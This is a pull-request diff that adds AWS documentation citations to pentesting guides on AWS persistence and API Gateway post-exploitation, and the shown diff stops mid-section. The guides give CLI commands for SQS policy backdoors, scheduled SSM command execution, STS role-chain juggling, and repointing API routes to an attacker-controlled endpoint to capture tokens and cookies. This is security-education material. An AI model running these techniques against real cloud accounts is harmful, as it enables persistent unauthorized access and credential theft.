### PR TITLE
Normalize references and citations, batch 006

### DIFF
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence/aws-sqs-orgid-policy-backdoor.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence/aws-sqs-orgid-policy-backdoor.md
@@ -1,8 +1,8 @@
 # AWS - SQS OrgID Policy Backdoor
 
-{{#include ../../../../banners/hacktricks-training.md}}
+An actor that can edit an SQS queue policy can use a resource-based `Allow` statement to grant message operations to principals from a selected AWS Organization. SQS documents organization-scoped queue-policy conditions using `aws:PrincipalOrgID`; IAM defines this global key as the requester's organization ID and includes it only when the principal belongs to an organization.<sup>[[1]](#references)[[2]](#references)</sup>
 
-Abuse an SQS queue resource policy to silently grant Send, Receive and ChangeMessageVisibility to any principal that belongs to a target AWS Organization using the condition aws:PrincipalOrgID. This creates an org-scoped hidden path that often evades controls that only look for explicit account or role ARNs or star principals.
+Using `Principal: "*"` with the organization condition creates a broad, org-scoped path that reviews looking only for explicit account or role ARNs can miss. AWS also states that policies using `aws:PrincipalOrgID` automatically cover accounts as they are added to or removed from the organization, without manually updating the policy.<sup>[[1]](#references)</sup>
 
 ### Backdoor policy (attach to the SQS queue policy)
 
@@ -29,12 +29,41 @@ Abuse an SQS queue resource policy to silently grant Send, Receive and ChangeMes
 }
 ```
 
+The `Resource` value must be the target queue ARN. The `Principal`, `Action`, `Resource`, and `Condition` elements together define which principals may perform the listed queue actions; anonymous requests do not carry `aws:PrincipalOrgID` and therefore do not satisfy this condition.<sup>[[1]](#references)[[2]](#references)[[6]](#references)</sup>
+
 ### Steps
-- Obtain the Organization ID with AWS Organizations API.
-- Get the SQS queue ARN and set the queue policy including the statement above.
-- From any principal that belongs to that Organization, send and receive a message in the queue to validate access.
+- Obtain the Organization ID with the AWS Organizations API. The `describe-organization` response exposes it as `Organization.Id`; use that `o-...` value in the policy.<sup>[[5]](#references)</sup>
+
+  ```bash
+  ORG_ID=$(aws organizations describe-organization \
+    --query 'Organization.Id' --output text)
+  ```
+
+- Get the SQS queue ARN from its queue URL, then set the queue policy with the statement above. `GetQueueAttributes` can return `QueueArn`, while condition-bearing custom policies are uploaded through the queue's `Policy` attribute.<sup>[[3]](#references)[[4]](#references)[[6]](#references)</sup>
+
+  ```bash
+  QUEUE_ARN=$(aws sqs get-queue-attributes \
+    --queue-url "$QUEUE_URL" \
+    --attribute-names QueueArn \
+    --query 'Attributes.QueueArn' --output text)
+  ```
+
+- Perform the policy update from the queue-owner account: SQS excludes `SetQueueAttributes` from cross-account permissions.<sup>[[4]](#references)</sup>
+
+- From a signed principal in an account belonging to the selected Organization, send and receive a message to validate access. For a cross-account caller, its IAM policy must also explicitly allow the actions; an explicit deny in either the queue or IAM policy overrides the allow.<sup>[[7]](#references)</sup>
 
 ### Impact
-- Organization-wide hidden access to read and write SQS messages from any account in the specified AWS Organization.
+- A matching principal can send and receive messages, change message visibility, and read queue attributes under this statement. This creates organization-wide read/write access for eligible principals instead of access limited to named account or role ARNs.<sup>[[2]](#references)[[6]](#references)</sup>
+- For cross-account callers, the queue policy alone is insufficient: the caller's IAM policy must also allow the actions, and customer-managed KMS encryption can add producer/consumer key permissions.<sup>[[7]](#references)</sup>
+
+## References
+
+- [1] [AWS global condition context keys](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_condition-keys.html)
+- [2] [Access management for encrypted Amazon SQS queues with least privilege policies](https://docs.aws.amazon.com/AWSSimpleQueueService/latest/SQSDeveloperGuide/sqs-least-privilege-policy.html)
+- [3] [Using custom policies with the Amazon SQS Access Policy Language](https://docs.aws.amazon.com/AWSSimpleQueueService/latest/SQSDeveloperGuide/sqs-creating-custom-policies.html)
+- [4] [SetQueueAttributes - Amazon Simple Queue Service](https://docs.aws.amazon.com/AWSSimpleQueueService/latest/APIReference/API_SetQueueAttributes.html)
+- [5] [describe-organization — AWS CLI 2 Command Reference](https://docs.aws.amazon.com/cli/latest/reference/organizations/describe-organization.html)
+- [6] [GetQueueAttributes - Amazon Simple Queue Service](https://docs.aws.amazon.com/AWSSimpleQueueService/latest/APIReference/API_GetQueueAttributes.html)
+- [7] [Troubleshoot an access denied error in Amazon SQS](https://docs.aws.amazon.com/AWSSimpleQueueService/latest/SQSDeveloperGuide/troubleshooting-access-denied.html)
 
 {{#include ../../../../banners/hacktricks-training.md}}

--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-ssm-persistence/README.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-ssm-persistence/README.md
@@ -1,6 +1,4 @@
-# AWS - SSM Perssitence
-
-{{#include ../../../../banners/hacktricks-training.md}}
+# AWS - SSM Persistence
 
 ## SSM
 
@@ -12,39 +10,46 @@ For more information check:
 
 ### Using ssm:CreateAssociation for persistence
 
-An attacker with the permission **`ssm:CreateAssociation`** can create a State Manager Association to automatically execute commands on EC2 instances managed by SSM. These associations can be configured to run at a fixed interval, making them suitable for backdoor-like persistence without interactive sessions.
+An attacker with the permission **`ssm:CreateAssociation`** can create a State Manager association that applies an SSM document to targeted managed nodes. A command document can execute commands on those nodes, and a recurring association schedule can provide persistence without an interactive session.<sup>[[1]](#references)[[4]](#references)</sup>
 
 
 ```bash
 aws ssm create-association \
   --name SSM-Document-Name \
   --targets Key=InstanceIds,Values=target-instance-id \
-  --parameters commands=["malicious-command"] \
+  --parameters 'commands=["malicious-command"]' \
   --schedule-expression "rate(30 minutes)" \
   --association-name association-name
 ```
 
 > [!NOTE]
-> This persistence method works as long as the EC2 instance is managed by Systems Manager, the SSM agent is running, and the attacker has permission to create associations. It does not require interactive sessions or explicit ssm:SendCommand permissions. **Important:** The `--schedule-expression` parameter (e.g., `rate(30 minutes)`) must respect AWS's minimum interval of 30 minutes. For immediate or one-time execution, omit `--schedule-expression` entirely — the association will execute once after creation.
+> The target must be a Systems Manager managed node with a running SSM Agent, and the referenced document must support that node. State Manager runs an association immediately after creation by default and then follows its schedule; omit `--schedule-expression` for an immediate one-time run. Association rate expressions support intervals of at least 30 minutes and less than 31 days. This path uses `ssm:CreateAssociation`, which is a distinct IAM action from `ssm:SendCommand`, and does not require an interactive Session Manager session.<sup>[[1]](#references)[[2]](#references)[[3]](#references)[[4]](#references)</sup>
 
 
 ### `ssm:UpdateDocument`, `ssm:UpdateDocumentDefaultVersion`, (`ssm:ListDocuments` | `ssm:GetDocument`)
 
-An attacker with the permissions **`ssm:UpdateDocument`** and **`ssm:UpdateDocumentDefaultVersion`** can escalate privileges by modifying existing documents. This also allows for persistence within that document. Practically the attacker would also need **`ssm:ListDocuments`** to get the names for custom documents and if the attacker wants to obfuscate their payload within an existing document **`ssm:GetDocument`** would be necessary as well.
+The permissions **`ssm:UpdateDocument`** and **`ssm:UpdateDocumentDefaultVersion`** allow a principal to update document content and select the default version. **`ssm:ListDocuments`** discovers document names and **`ssm:GetDocument`** reads document content; those read permissions are useful for discovery and read-back but are not prerequisites when the name and content are already known.<sup>[[4]](#references)[[5]](#references)[[6]](#references)[[7]](#references)[[8]](#references)</sup>
+
+An attacker with the update and default-version permissions can escalate privileges by replacing the content of an existing document and making the new version the default. If State Manager associations use that document, this can provide persistence or trigger execution when the association runs; AWS notes that changing a document version can run an association immediately unless `apply-only-at-cron-interval` was set.<sup>[[1]](#references)[[4]](#references)[[7]](#references)</sup>
 
 ```bash
 aws ssm list-documents
 aws ssm get-document --name "target-document" --document-format YAML
-# You will need to specify the version you're updating
-aws ssm update-document \
+latest_version=$(aws ssm update-document \
   --name "target-document" \
   --document-format YAML \
   --content "file://doc.yaml" \
-  --document-version 1
-aws ssm update-document-default-version --name "target-document" --document-version 2
+  --document-version '$LATEST' \
+  --query 'DocumentDescription.LatestVersion' \
+  --output text)
+aws ssm update-document-default-version \
+  --name "target-document" \
+  --document-version "$latest_version"
 ```
 
-Below is an example document that can be used to overwrite and existing document. You will want to ensure your document type matches the target documents type to issues with innvocation. The document below for instance will the **`ssm:SendCommand`** and **`ssm:CreateAssociation`** examples.
+The workflow above updates only the latest document version, captures the returned version number, and then selects it as the default. Reading an existing document with **`ssm:GetDocument`** can also help preserve its structure or hide a payload in otherwise familiar content.<sup>[[6]](#references)[[7]](#references)[[8]](#references)</sup>
+
+Below is an example document that can be used to overwrite an existing document. Ensure that its document type and platform match the target to avoid invocation issues. The document below can be used with both the **`ssm:SendCommand`** and **`ssm:CreateAssociation`** examples. It keeps the original marker command as the default while allowing the `commands` parameter to override it.<sup>[[9]](#references)[[10]](#references)</sup>
 
 ```yaml
 schemaVersion: '2.2'
@@ -53,22 +58,24 @@ parameters:
   commands:
     type: StringList
     description: "The commands to run."
+    default:
+      - "id > /tmp/pwn_test.txt"
     displayType: textarea
 mainSteps:
   - action: aws:runShellScript
     name: runCommands
     inputs:
-      runCommand: 
-        - "id > /tmp/pwn_test.txt"
+      runCommand:
+        - "{{ commands }}"
 ```
 
 ### `ssm:RegisterTaskWithMaintenanceWindow`, `ssm:RegisterTargetWithMaintenanceWindow`, (`ssm:DescribeMaintenanceWindows` | `ec2:DescribeInstances`)
 
-An attacker with the permissions **`ssm:RegisterTaskWithMaintenanceWindow`** and **`ssm:RegisterTargetWithMaintenanceWindow`** can escalate privileges by first registering a new target with an existing maintenance window and then updating registering a new task. This achieves execution on the existing targets, but can allow an attacker to compromise compute with different roles by register new targets. This also allows for persistence as maintenance windows tasks are executed on a pre-defined interval during the window creation. Practically the attacker would also need **`ssm:DescribeMaintenanceWindows`** to get the maintenance window IDs.
+An attacker with the permissions **`ssm:RegisterTaskWithMaintenanceWindow`** and **`ssm:RegisterTargetWithMaintenanceWindow`** can escalate privileges by first registering a target with an existing maintenance window and then registering a Run Command task. The window schedule, registered targets, and registered tasks determine when and where the command runs; depending on the maintenance-window service role and node privileges, this can execute on compute with different permissions and persist across window runs. The attacker would also need **`ssm:DescribeMaintenanceWindows`** to discover window IDs and may use **`ec2:DescribeInstances`** to discover instance IDs.<sup>[[4]](#references)[[11]](#references)[[12]](#references)[[13]](#references)[[14]](#references)[[15]](#references)[[16]](#references)</sup>
 
 ``` bash
 aws ec2 describe-instances
-aws ssm describe-maintenance-window
+aws ssm describe-maintenance-windows
 aws ssm register-target-with-maintenance-window \
   --window-id "<mw-id>" \
   --resource-type "INSTANCE" \
@@ -83,7 +90,26 @@ aws ssm register-task-with-maintenance-window \
   --max-errors 100
 ```
 
+If `--service-role-arn` is omitted, Systems Manager uses a service-linked role for the maintenance-window task; supplying a custom role also requires the appropriate `iam:PassRole` permission.<sup>[[4]](#references)[[13]](#references)</sup>
+
+## References
+
+- [1] [CreateAssociation - AWS Systems Manager](https://docs.aws.amazon.com/systems-manager/latest/APIReference/API_CreateAssociation.html)
+- [2] [Reference: Cron and rate expressions for Systems Manager - AWS Systems Manager](https://docs.aws.amazon.com/systems-manager/latest/userguide/reference-cron-and-rate-expressions.html)
+- [3] [Working with SSM Agent - AWS Systems Manager](https://docs.aws.amazon.com/systems-manager/latest/userguide/ssm-agent.html)
+- [4] [Actions, resources, and condition keys for AWS Systems Manager](https://docs.aws.amazon.com/service-authorization/latest/reference/list_ssm.html)
+- [5] [list-documents - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/ssm/list-documents.html)
+- [6] [get-document - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/ssm/get-document.html)
+- [7] [UpdateDocument - AWS Systems Manager](https://docs.aws.amazon.com/systems-manager/latest/APIReference/API_UpdateDocument.html)
+- [8] [update-document-default-version - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/ssm/update-document-default-version.html)
+- [9] [Command document plugin reference - AWS Systems Manager](https://docs.aws.amazon.com/systems-manager/latest/userguide/documents-command-ssm-plugin-reference.html)
+- [10] [Data elements and parameters - AWS Systems Manager](https://docs.aws.amazon.com/systems-manager/latest/userguide/documents-syntax-data-elements-parameters.html)
+- [11] [AWS Systems Manager Maintenance Windows](https://docs.aws.amazon.com/systems-manager/latest/userguide/maintenance-windows.html)
+- [12] [register-target-with-maintenance-window - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/ssm/register-target-with-maintenance-window.html)
+- [13] [register-task-with-maintenance-window - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/ssm/register-task-with-maintenance-window.html)
+- [14] [Examples: Register tasks with a maintenance window - AWS Systems Manager](https://docs.aws.amazon.com/systems-manager/latest/userguide/mw-cli-register-tasks-examples.html)
+- [15] [describe-maintenance-windows - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-maintenance-windows.html)
+- [16] [describe-instances - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/ec2/describe-instances.html)
+
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
 

--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence/README.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence/README.md
@@ -1,7 +1,5 @@
 # AWS - Step Functions Persistence
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## Step Functions
 
 For more information check:
@@ -12,14 +10,16 @@ For more information check:
 
 ### Step function Backdooring
 
-Backdoor a step function to make it perform any persistence trick so every time it's executed it will run your malicious steps.
+Add a malicious state to the state machine definition so executions that use it also perform the chosen persistence action. To preserve the modified workflow as a versioned backdoor, publish the updated definition; Step Functions versions are immutable snapshots that cannot be edited in place.<sup>[[1]](#references)</sup>
 
 ### Backdooring aliases
 
-If the AWS account is using aliases to call step functions it would be possible to modify an alias to use a new backdoored version of the step function.
+If applications invoke the state machine through an alias, redirect that alias to the version containing the added state. An alias can point to one or two state machine versions, and its routing can be updated without changing the client code; point it at the backdoored version so subsequent executions use it.<sup>[[2]](#references)[[3]](#references)</sup>
+
+## References
+
+- [1] [State machine versions in Step Functions workflows](https://docs.aws.amazon.com/step-functions/latest/dg/concepts-state-machine-version.html)
+- [2] [CreateStateMachineAlias - AWS Step Functions API Reference](https://docs.aws.amazon.com/step-functions/latest/apireference/API_CreateStateMachineAlias.html)
+- [3] [Example: Alias and version deployment in Step Functions](https://docs.aws.amazon.com/step-functions/latest/dg/example-alias-version-deployment.html)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-

--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence/README.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence/README.md
@@ -1,7 +1,5 @@
 # AWS - STS Persistence
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## STS
 
 For more information access:
@@ -12,7 +10,9 @@ For more information access:
 
 ### Assume role token
 
-Temporary tokens cannot be listed, so maintaining an active temporary token is a way to maintain persistence.
+Temporary security credentials are generated dynamically instead of being stored with the IAM user, and AWS no longer recognizes them after expiration. If the principal can still request sessions, obtaining a fresh token before expiry can preserve access; a captured token remains usable only for its validity period.<sup>[[1]](#references)</sup>
+
+Call `GetSessionToken` with long-term credentials (normally an IAM user). IAM-user sessions can last from 15 minutes to 36 hours, while sessions requested with account-root credentials are limited to one hour. The returned session can call only `AssumeRole` or `GetCallerIdentity` in STS; when an IAM policy requires MFA, pass `SerialNumber` and `TokenCode`.<sup>[[2]](#references)</sup>
 
 <pre class="language-bash"><code class="lang-bash">aws sts get-session-token --duration-seconds 129600
 
@@ -23,14 +23,18 @@ aws sts get-session-token \
 
 # Hardware device name is usually the number from the back of the device, such as GAHT12345678
 <strong># SMS device name is the ARN in AWS, such as arn:aws:iam::123456789012:sms-mfa/username
-</strong># Vritual device name is the ARN in AWS, such as arn:aws:iam::123456789012:mfa/username
+</strong># Virtual device name is the ARN in AWS, such as arn:aws:iam::123456789012:mfa/username
 </code></pre>
+
+AWS has ended support for enabling new SMS MFA devices; keep the SMS form above only for legacy accounts that still expose one.<sup>[[2]](#references)[[8]](#references)</sup>
 
 ### Role Chain Juggling
 
-[**Role chaining is an acknowledged AWS feature**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_terms-and-concepts.html#Role%20chaining), often utilized for maintaining stealth persistence. It involves the ability to **assume a role which then assumes another**, potentially reverting to the initial role in a **cyclical manner**. Each time a role is assumed, the credentials' expiration field is refreshed. Consequently, if two roles are configured to mutually assume each other, this setup allows for the perpetual renewal of credentials.
+[**Role chaining**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles.html#id_roles_terms-and-concepts) is when temporary credentials from one role are used to assume a second role. AWS supports it through the console, CLI, and API, but a chained CLI/API session is capped at one hour; a `DurationSeconds` value above one hour fails even when the role's configured maximum is higher.<sup>[[3]](#references)[[4]](#references)</sup>
 
-You can use this [**tool**](https://github.com/hotnops/AWSRoleJuggler/) to keep the role chaining going:
+With suitable trust policies and permissions, a cycle such as `RoleA -> RoleB -> RoleA` can be used to call `AssumeRole` repeatedly before the current credentials expire. Each successful call returns a new role session and expiration, so rotating through the cycle can extend access for as long as the chain remains usable. This is the role-chain-juggling persistence technique demonstrated in original research.<sup>[[4]](#references)[[5]](#references)</sup>
+
+You can use this [**tool**](https://github.com/hotnops/AWSRoleJuggler/) to find circular trust and rotate through a supplied role list. Its README describes refreshing the session every 15 minutes, while each individual chained session remains subject to the one-hour limit.<sup>[[3]](#references)[[6]](#references)</sup>
 
 ```bash
 ./aws_role_juggler.py -h
@@ -42,7 +46,7 @@ optional arguments:
 ```
 
 > [!CAUTION]
-> Note that the [find_circular_trust.py](https://github.com/hotnops/AWSRoleJuggler/blob/master/find_circular_trust.py) script from that Github repository doesn't find all the ways a role chain can be configured.
+> Note that the [find_circular_trust.py](https://github.com/hotnops/AWSRoleJuggler/blob/master/find_circular_trust.py) script is a small helper and does not find every way a role chain can be configured.<sup>[[6]](#references)[[7]](#references)</sup>
 
 <details>
 
@@ -128,8 +132,15 @@ Write-Host "Role juggling check complete."
 
 </details>
 
+## References
+
+- [1] [Temporary security credentials in IAM](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_temp.html)
+- [2] [GetSessionToken - AWS Security Token Service](https://docs.aws.amazon.com/STS/latest/APIReference/API_GetSessionToken.html)
+- [3] [IAM roles - AWS Identity and Access Management](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles.html#id_roles_terms-and-concepts)
+- [4] [AssumeRole - AWS Security Token Service](https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRole.html)
+- [5] [Persistent AWS access with role chain juggling](https://specterops.io/blog/2020/07/16/persistent-aws-access-with-role-chain-juggling/)
+- [6] [AWSRoleJuggler](https://github.com/hotnops/AWSRoleJuggler/)
+- [7] [find_circular_trust.py](https://github.com/hotnops/AWSRoleJuggler/blob/master/find_circular_trust.py)
+- [8] [Check MFA status - AWS Identity and Access Management](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_mfa_checking-status.html)
+
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-

--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation/README.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation/README.md
@@ -1,7 +1,5 @@
 # AWS - API Gateway Post Exploitation
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## API Gateway
 
 For more information check:
@@ -12,25 +10,24 @@ For more information check:
 
 ### Access unexposed APIs
 
-You can create an endpoint in [https://us-east-1.console.aws.amazon.com/vpc/home#CreateVpcEndpoint](https://us-east-1.console.aws.amazon.com/vpc/home?region=us-east-1#CreateVpcEndpoint:) with the service `com.amazonaws.us-east-1.execute-api`, expose the endpoint in a network where you have access (potentially via an EC2 machine) and assign a security group allowing all connections.\
-Then, from the EC2 machine you will be able to access the endpoint and therefore call the gateway API that wasn't exposed before.
+You can create an interface endpoint in the [VPC console](https://us-east-1.console.aws.amazon.com/vpc/home?region=us-east-1#CreateVpcEndpoint:) with the service `com.amazonaws.us-east-1.execute-api`, expose the endpoint in a network where you have access (potentially via an EC2 machine), and assign a security group allowing the required HTTPS connections. From that network, you can invoke a private REST API through the endpoint.<sup>[[1]](#references)[[2]](#references)</sup>
 
 ### Bypass Request body passthrough
 
-This technique was found in [**this CTF writeup**](https://blog-tyage-net.translate.goog/post/2023/2023-09-03-midnightsun/?_x_tr_sl=en&_x_tr_tl=es&_x_tr_hl=en&_x_tr_pto=wapp).
+This technique was found in [**this CTF writeup**](https://blog.tyage.net/post/2023/2023-09-03-midnightsun/).<sup>[[3]](#references)</sup>
 
-As indicated in the [**AWS documentation**](https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-method-integration.html) in the `PassthroughBehavior` section, by default, the value **`WHEN_NO_MATCH`** , when checking the **Content-Type** header of the request, will pass the request to the back end with no transformation.
+As indicated in the [**AWS documentation**](https://docs.aws.amazon.com/AWSCloudFormation/latest/TemplateReference/aws-properties-apigateway-method-integration.html) in the `PassthroughBehavior` section, **`WHEN_NO_MATCH`** passes a request body with an unmapped `Content-Type` to the backend without transformation.<sup>[[4]](#references)</sup>
 
-Therefore, in the CTF the API Gateway had an integration template that was **preventing the flag from being exfiltrated** in a response when a request was sent with `Content-Type: application/json`:
+Therefore, in the CTF, the API Gateway integration used a template that **prevented the flag from being exfiltrated** when a request was sent with `Content-Type: application/json`:<sup>[[3]](#references)</sup>
 
 ```yaml
 RequestTemplates:
   application/json: '{"TableName":"Movies","IndexName":"MovieName-Index","KeyConditionExpression":"moviename=:moviename","FilterExpression": "not contains(#description, :flagstring)","ExpressionAttributeNames": {"#description": "description"},"ExpressionAttributeValues":{":moviename":{"S":"$util.escapeJavaScript($input.params(''moviename''))"},":flagstring":{"S":"midnight"}}}'
 ```
 
-However, sending a request with **`Content-type: text/json`** would prevent that filter.
+However, sending a request with **`Content-Type: text/json`** used an unmapped content type and bypassed that filter.<sup>[[3]](#references)[[4]](#references)</sup>
 
-Finally, as the API Gateway was only allowing `Get` and `Options`, it was possible to send an arbitrary dynamoDB query without any limit sending a POST request with the query in the body and using the header `X-HTTP-Method-Override: GET`:
+Finally, because the API Gateway route only accepted `GET` and `OPTIONS`, the writeup used a `POST` request with the query in the body and the header `X-HTTP-Method-Override: GET` to send an arbitrary DynamoDB query:<sup>[[3]](#references)</sup>
 
 ```bash
 curl https://vu5bqggmfc.execute-api.eu-north-1.amazonaws.com/prod/movies/hackers -H 'X-HTTP-Method-Override: GET' -H 'Content-Type: text/json'  --data '{"TableName":"Movies","IndexName":"MovieName-Index","KeyConditionExpression":"moviename = :moviename","ExpressionAttributeValues":{":moviename":{"S":"hackers"}}}'
@@ -38,13 +35,13 @@ curl https://vu5bqggmfc.execute-api.eu-north-1.amazonaws.com/prod/movies/hackers
 
 ### Usage Plans DoS
 
-In the **Enumeration** section you can see how to **obtain the usage plan** of the keys. If you have the key and it's **limited** to X usages **per month**, you could **just use it and cause a DoS**.
+In the **Enumeration** section you can see how to **obtain the usage plan** of the keys. If a key has a monthly quota or throttle, repeatedly consuming it may deny or limit requests that use that key. AWS notes that usage-plan quotas and throttles are best-effort rather than hard limits, so this is not a guaranteed denial of service.<sup>[[5]](#references)</sup>
 
-The **API Key** just need to be **included** inside a **HTTP header** called **`x-api-key`**.
+When the method requires an API key, include the **API key** in the **`x-api-key`** HTTP header.<sup>[[5]](#references)[[6]](#references)</sup>
 
 ### Swap Route Integration To Exfil Traffic (HTTP APIs / `apigatewayv2`)
 
-If you can update an **HTTP API integration**, you can **repoint** a sensitive route (e.g. `/login`, `/token`, `/submit`) to an attacker-controlled HTTP endpoint and silently **collect headers and bodies** (cookies, `Authorization` bearer tokens, session ids, API keys, secrets sent by internal jobs, etc.).
+If you can update an **HTTP API integration**, an `HTTP_PROXY` integration can pass the entire request and response between API Gateway and a publicly routable endpoint. Repointing a sensitive route (e.g. `/login`, `/token`, `/submit`) to an attacker-controlled endpoint can therefore **collect headers and bodies** (cookies, `Authorization` bearer tokens, session ids, API keys, secrets sent by internal jobs, etc.).<sup>[[7]](#references)[[8]](#references)</sup>
 
 Example workflow:
 
@@ -64,111 +61,145 @@ aws apigatewayv2 update-integration --region "$REGION" --api-id "$API_ID" --inte
 
 Notes:
 
-- For **HTTP APIs**, changes usually take effect immediately (unlike REST APIs where you typically need to create a deployment).
-- Whether you can point to an arbitrary URL depends on the integration type/config; in some cases you may also be able to change the integration type when patching it.
+- For **HTTP APIs**, whether an integration change is live depends on the stage's automatic-deployment setting. With automatic deployment enabled, changes are released automatically; otherwise, deploy the API explicitly. REST API integration changes require redeployment to an existing or new stage.<sup>[[9]](#references)[[10]](#references)</sup>
+- An `HTTP_PROXY` integration requires a publicly routable URL; private integrations use an ARN for an Application Load Balancer listener, Network Load Balancer listener, or AWS Cloud Map service. Whether the update is accepted depends on the integration type and configuration.<sup>[[7]](#references)[[8]](#references)</sup>
 
-### `apigateway:UpdateGatewayResponse`, `apigateway:CreateDeployment`
+The headings below name API Gateway control-plane operations. In IAM, the API Gateway Management service maps these REST API operations to verb permissions such as `apigateway:PATCH`, `apigateway:POST`, and `apigateway:PUT`; verify the mapping when writing a policy.<sup>[[11]](#references)</sup>
 
-An attacker with the permissions `apigateway:UpdateGatewayResponse` and `apigateway:CreateDeployment` can **modify an existing Gateway Response to include custom headers or response templates that leak sensitive information or execute malicious scripts**.
+### `apigateway:PATCH` / `apigateway:POST` (`UpdateGatewayResponse`, `CreateDeployment`)
+
+An attacker allowed to call `UpdateGatewayResponse` (`apigateway:PATCH`) and `CreateDeployment` (`apigateway:POST`) can **modify a GatewayResponse's headers or response templates and publish the change in a REST API deployment**. Gateway responses can include request- or context-derived values, so an unsafe change can leak information to callers.<sup>[[11]](#references)[[12]](#references)[[13]](#references)</sup>
 
 ```bash
 API_ID="your-api-id"
 RESPONSE_TYPE="DEFAULT_4XX"
 
 # Update the Gateway Response
-aws apigateway update-gateway-response --rest-api-id $API_ID --response-type $RESPONSE_TYPE --patch-operations op=replace,path=/responseTemplates/application~1json,value="{\"message\":\"$context.error.message\", \"malicious_header\":\"malicious_value\"}"
+aws apigateway update-gateway-response \
+  --rest-api-id "$API_ID" \
+  --response-type "$RESPONSE_TYPE" \
+  --patch-operations '[{"op":"replace","path":"/responseTemplates/application~1json","value":"{\"message\":\"$context.error.messageString\",\"malicious_header\":\"malicious_value\"}"}]'
 
 # Create a deployment for the updated API Gateway REST API
 aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod
 ```
 
-**Potential Impact**: Leakage of sensitive information, executing malicious scripts, or unauthorized access to API resources.
+**Potential Impact**: Leakage of request or context data, or attacker-controlled response content being interpreted unsafely by a client. Script execution requires a separate client-side sink.<sup>[[12]](#references)</sup>
 
 > [!NOTE]
 > Need testing
 
-### `apigateway:UpdateStage`, `apigateway:CreateDeployment`
+### `apigateway:PATCH` / `apigateway:POST` (`UpdateStage`, `CreateDeployment`)
 
-An attacker with the permissions `apigateway:UpdateStage` and `apigateway:CreateDeployment` can **modify an existing API Gateway stage to redirect traffic to a different stage or change the caching settings to gain unauthorized access to cached data**.
+An attacker allowed to call `UpdateStage` (`apigateway:PATCH`) and `CreateDeployment` (`apigateway:POST`) can **change stage caching settings or point a stage at a different deployment**, altering which API snapshot serves traffic. If cached responses contain sensitive data and caching controls are misconfigured, this can also expose that data.<sup>[[11]](#references)[[12]](#references)[[14]](#references)[[15]](#references)</sup>
 
 ```bash
 API_ID="your-api-id"
 STAGE_NAME="Prod"
 
 # Update the API Gateway stage
-aws apigateway update-stage --rest-api-id $API_ID --stage-name $STAGE_NAME --patch-operations op=replace,path=/cacheClusterEnabled,value=true,op=replace,path=/cacheClusterSize,value="0.5"
+aws apigateway update-stage --rest-api-id "$API_ID" --stage-name "$STAGE_NAME" --patch-operations op=replace,path=/cacheClusterEnabled,value=true,op=replace,path=/cacheClusterSize,value="0.5"
 
 # Create a deployment for the updated API Gateway REST API
-aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod
+aws apigateway create-deployment --rest-api-id "$API_ID" --stage-name "$STAGE_NAME"
 ```
 
-**Potential Impact**: Unauthorized access to cached data, disrupting or intercepting API traffic.
+**Potential Impact**: Disrupted traffic, altered routing, or exposure of cached responses when the stage's cache configuration is unsafe.<sup>[[14]](#references)[[15]](#references)</sup>
 
 > [!NOTE]
 > Need testing
 
-### `apigateway:PutMethodResponse`, `apigateway:CreateDeployment`
+### `apigateway:PUT` / `apigateway:POST` (`PutMethodResponse`, `CreateDeployment`)
 
-An attacker with the permissions `apigateway:PutMethodResponse` and `apigateway:CreateDeployment` can **modify the method response of an existing API Gateway REST API method to include custom headers or response templates that leak sensitive information or execute malicious scripts**.
+An attacker allowed to call `PutMethodResponse` (`apigateway:PUT`) and `CreateDeployment` (`apigateway:POST`) can **add response headers or response models to an existing API Gateway REST API method**. A method-response header is populated only when an integration response maps a value into it; `PutMethodResponse` alone does not add a response template or execute code.<sup>[[11]](#references)[[13]](#references)[[16]](#references)</sup>
 
 ```bash
 API_ID="your-api-id"
 RESOURCE_ID="your-resource-id"
 HTTP_METHOD="GET"
 STATUS_CODE="200"
+STAGE_NAME="Prod"
 
 # Update the method response
-aws apigateway put-method-response --rest-api-id $API_ID --resource-id $RESOURCE_ID --http-method $HTTP_METHOD --status-code $STATUS_CODE --response-parameters "method.response.header.malicious_header=true"
+aws apigateway put-method-response --rest-api-id "$API_ID" --resource-id "$RESOURCE_ID" --http-method "$HTTP_METHOD" --status-code "$STATUS_CODE" --response-parameters "method.response.header.malicious_header=true"
 
 # Create a deployment for the updated API Gateway REST API
-aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod
+aws apigateway create-deployment --rest-api-id "$API_ID" --stage-name "$STAGE_NAME"
 ```
 
-**Potential Impact**: Leakage of sensitive information, executing malicious scripts, or unauthorized access to API resources.
